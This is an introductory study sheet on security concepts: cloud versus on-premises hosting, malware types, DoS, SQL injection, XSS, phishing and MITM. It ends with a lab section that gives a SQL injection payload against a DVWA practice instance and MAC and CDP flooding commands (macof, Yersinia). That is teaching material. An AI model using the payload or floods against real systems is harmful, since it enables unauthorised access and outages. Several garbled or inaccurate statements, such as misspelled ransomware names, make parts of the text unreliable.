Security Concepts

On-Premises:

• On-premises solutions are physically located at an organization’s office site such as DC.
• On-premises solutions are physically hosting locations of their choice such as Data Centers.
• On-premises is software & technology that is located within the physical company's DC.
• By installing & running software on hardware located within the premises of the company.
• The IT staff has physical access to the data and can directly control the configuration.
• The IT staff has to manage and secure the computing infrastructure and data.
• Uses its physical servers and IT infrastructure to install and host the solution locally.

Cloud:

• Cloud is hosted on servers that a vendor hosting company maintains.
• Cloud is such as Microsoft Azure and accessed through an Internet-connected device.
• Where third parties are responsible for managing & securing the infrastructure servers.
• Cloud Computing is the alternative to On-Premises software and technologies.
• Cloud is frequently considered for its potential cost savings and reduced expenses.
• Cloud is also considered to reduce power consumption, maintenance, and security.
• Security is one of the biggest reasons organizations do not use cloud-network solutions.

Malware:

• Malware is a term that is short for “Malicious Software” a file code or application.
• Malware (Malicious Software) is any program or file, that is harmful to a computer user.
• Malicious Software is typically delivered over a network that infects, explores, and steals.
• Malware (Malicious Software) can be conducted in virtually any behavior an attacker wants.
• Malware (Malicious Software) is an inclusive term, for all types of malicious software.
• Malicious Software is a term for all Viruses, Worms, Trojans, Rootkits, and Spyware.
• Malware is also a term for Adware, Scareware, Botnets, Logic Bombs, Key loggers, etc.
• Many tools can identify Malware on the network such as Packet Capture to analyze.
• In addition, tools Snort, NetFlow, IPS, Advanced Malware Protection, Cisco FirePOWER, etc.

Virus:

• Malicious code that is attached to executable files that are often a regular application.
• Viruses require some human or any other application interaction to activate.
• The entire category of viruses is designed to damage or destroy a system or data.

Worm:

• Worms are malware that replicate themselves and spread to infect other systems.
• Think of worms as small programs that replicate themselves in a computer network.
• A worm can travel from system to system without human or application interaction.
• When a worm executes, it can replicate again & infect even more systems or computers.
• Worms destroy the files and data on the user’s computer or system or Computer network.
• Worms usually target the operating system (OS) files to make them empty & destroy.
• Worms typically cause harm to the computer network and consume the bandwidth.

Adware:

• Adware is a computer term, which stands for Advertising-Supported Malware.
• Adware works by executing advertisements to generate revenue for the hackers.
• Adware (Advertising-Supported Malware) is any type of advertising-supported software.
• Adware will play, display, or download advertisements automatically on a user's computer.
• Adware will play once the software has been installed or the application is in use.

Ransomware:

• It propagates like a worm but is designed to encrypt personal files on the victim’s hard drive.
• Ransomware works by encrypting the hard drive and all files on a system or Computer.
• Ransomware can encrypt specific files in your system or all your files or mast boot records.
• Ransomware then asks for a payment in exchange for giving the decryption key.
• Major Ransomware like Reveton, CryptoLocker, CryptoWall, Pyeta, Nyeta, and Bad Rabbit.
• More recently Ransomware 2017 WannaCry attack was launched which destroyed many PCs.
• Ransomware caused no small amount of destruction, but it caused huge destruction.

Trojan:

• Trojans are malicious programs that appear like regular applications or programs.
• Trojans are malicious programs that appear like media files or other computer files.
• Trojans contain a malicious payload; the payload can be anything malicious acts etc.
• Trojan's payload provides a backdoor that allows attackers unauthorized access to the system.
• Trojans pretend to do one thing but, when loaded, actually perform another malicious.
• A few Trojan categories are command-shell Trojans and graphical user interface (GUI) Trojans.
• HTTP/HTTPS Trojans, document Trojans, defacement Trojans, botnet Trojans, VNC Trojans.
• Remote-Access Trojans, data-hiding Trojans, banking Trojans, DoS Trojans, FTP Trojans.
• Software-disabling Trojans and covert-channel Trojans are a few examples of trojans.
• Remote-access Trojans (RATs) allow the attacker full control over the system or PC.
• The idea behind this type of Trojan is to hide the user’s data sometimes known as ransomware.
• Security-software disablers Trojans are designed to attack and kill antivirus or firewalls.
• Denial of Service (DoS), These Trojans are designed to cause a DoS Denial of Service.
• They can be designed to knock out specific services or to bring an entire system offline.
• Trojans are dangerous, they represent a loss of confidentiality, integrity, and availability.
• Common targets of Trojans Credit card data & banking info have become huge targets.
• Passwords are always a big target of the second common target of trojan malware.
• P2P networks and file-sharing sites such as The Pirate Bay are generally unmonitored.
• And allow anyone to spread any programs they want, legitimate or not like the Trojans.
• Instant Messaging, Internet Relay Chat, Email attachments, browser extension, etc.

Spyware:

• Spyware computer network term, which is a common type of malware.
• Spyware monitors the activities performed by a computer user on the PC.
• The main intention of spyware is to collect the private information of PC users.
• Spyware normally comes from the internet while users download freeware software.
• Spyware is another form of malicious code that is similar to Trojan horse malware.

Rootkits:

• A rootkit is a collection of software specifically designed to permit malware.
• Rootkits gather information, into your system, Computer, or computer network.
• These work in the background so that a user may not notice anything suspicious.
• Rootkits in the background permit several types of malware to get into the system.
• The term rootkit is derived from the combination of two words – "root" and "kit".
• Root refers to the administrator account in Unix and Linux operating systems etc.
• Kit refers to programs that allow threat actors to obtain unauthorized root/admin access.

Keyloggers:

• Keylogger is a network term which is Keystroke loggers software or Hardwar.
• Software, which records all the information that is typed using a keyboard.
• Keyloggers store the gathered information and send it to the attacker.
• Attackers extract sensitive information like passwords or credit card details.

Scareware:

• Scareware is a type of malware, which is designed to trick victims.
• Scareware tricks victims into purchasing and downloading useless software.
• Scareware tricks victims into downloading potentially dangerous software.
• Scareware generates pop-ups that resemble Windows system messages.
• Scareware usually purports to be antivirus or antispyware software or malware.
• Scareware also usually pops up a firewall application or a registry cleaner.
• The messages typically say that a large number of problems such as infected files.
• The user is prompted to purchase software to fix Computer or system problems.
• In reality, no problems were detected, and the suggested software contained malware.

Logic Bomb:

• A Logic Bomb is a malware that is triggered by a response to an event.
• Such as launching an application or when a specific date/time is reached.
• Attackers can use logic bombs in a variety of ways to destroy data or systems.
• They can embed arbitrary code within a fake application, or Trojan horse.
• Logic Bomb will be executed whenever you launch the fraudulent software.
• Attackers can also use a combination of spyware and logic bombs to steal identity.

Botnet:

• The word botnet is made up of two words: bot and net.
• So, Bot is short for robot and Net comes from the network.
• People who write and operate malware cannot manually log onto every computer.
• They have infected, instead, they use botnets to manage a large number of systems.
• A botnet is a network of infected computers, used by the malware to spread.
• Cybercriminals use special Trojan viruses to breach the security of several users’ PCs.
• Cybercriminals take control of each computer & organize all of the infected PCs.
• Cybercriminals remotely manage and organize all infected computer bots.

DoS (Denial of Service) Attack:

• DoS Attack is a type of attack on to network server with a large number of service requests.
• DoS attacks can cause the server to crash the server & legitimate users are denied the service.
• DDoS stands for (Distributed Denial of Service) an Attack, which is one type of DoS attack.
• DDoS originates from many attacking computers from different geographical regions.
• Zombies and Botnets are mainly used in DDoS (Distributed Denial of Service) attacks.
• Both types of attack DoS and DDoS can cause the services to become unavailable to users.
• Such as Ping of Death, Smurf Attack, TCP SYN, CDP Flood, Buffer Overflow, and ICMP Flood.
• Cloud is more vulnerable to DoS attacks because it is shared by many users & organizations.

SQL Injection:

• SQL injection is a code injection technique that might destroy your database.
• SQL injection is one of the most common web hacking techniques to gain access.
• SQL injection is the placement of malicious code in SQL statements, via web page input.
• SQL Injection is an injection attack that makes it possible to execute malicious SQL statements.
• Attackers can use SQL Injection vulnerabilities to bypass application security measures.
• SQL Injection (SQLi) is also used to add, modify, and delete records in the database.
• SQL injection attack exploits vulnerable cloud-based applications to allow pass SQL commands.

Cross-Site Scripting:

• XSS is a term, which stands for Cross-Site Scripting Errors, which are a type of coding error.
• Where a malicious party can trigger the execution of software from their browser.
• Cross-site scripting is a type of security vulnerability found in web applications.
• XSS enables attackers to inject client-side scripts into web pages viewed by other users.
• The common purpose of an XSS attack is to collect cookie data such as session IDs or login info.
• XSS is used to steal cookies exploited to gain access as an authenticated user to a cloud-based.
• Three major categories are Reflected XSS, Stored(Persistent) XSS, and DOM-Based XSS.

Phishing:

• Phishing is a type of social engineering attack often used to steal user data or info.
• Phishing is a social engineering attack to steal login credentials & credit card numbers.
• Phishing is a method of trying to gather personal info using deceptive e-mails & websites.
• Phishing is a cyber-attack that uses disguised email as a weapon to steal user data or info.

Man in The Middle:

• MITM (Man in The Middle) means man in the middle of your conversation.
• In a Man-in-The-Middle attack, attackers place themselves between two devices.
• MITM attack to intercept or modify communications between the two devices.
• MITM cyberattacks allow attackers to secretly intercept communications.
• MITM attack happens when hacker inserts themselves between a user & apps.
• Attackers have many different reasons and methods for using an MITM attack.
• MITM is used to steal something, like credit card numbers or user login credentials.
• MITM attacks involve interception of communication between two digital systems.

Data Breach:

• Data breaches can involve data that was not supposed to be released to the public.
• Which includes financial information, personal health information & trade secrets.
• Which includes. Personally, identifiable information and other intellectual property.
• The value of the organization’s cloud-based data might be different for different people.
• Data Breach happen if the organization lacks managing authentication & identity properly.
• Businesses need to properly allocate access to data as per every user’s job role.
• One-time passwords & phone-based authentications are the two-factor authentications.
• That helps secure cloud services by making it tough for the attacks to steal the credentials.

Lab Time:

1- Go to https://geekprank.com/ link to show Virus and Ransomware.

2- Go to https://www.eicar.org/?page_id=3950 and download the virus file to test the antivirus software.

3- Go to Windows XP to show Key Keylogger key stock records using the Blackbox free tool.

4- Go to Windows XP Start XAMPP Control Panel, open 192.168.122.60/dvwa username admin password is password, go DVWA Security make low, and submit. Click on SQL Injection in User ID: %' or '0'='0 and click submit it will show all the records.

5- DoS Attack start Kali Linux, take a Switch in GNS3 connect to Kali Linux, and Use macof -i eth0 for flooding attack. Use Yersina -G for CDP flooding Attack.

?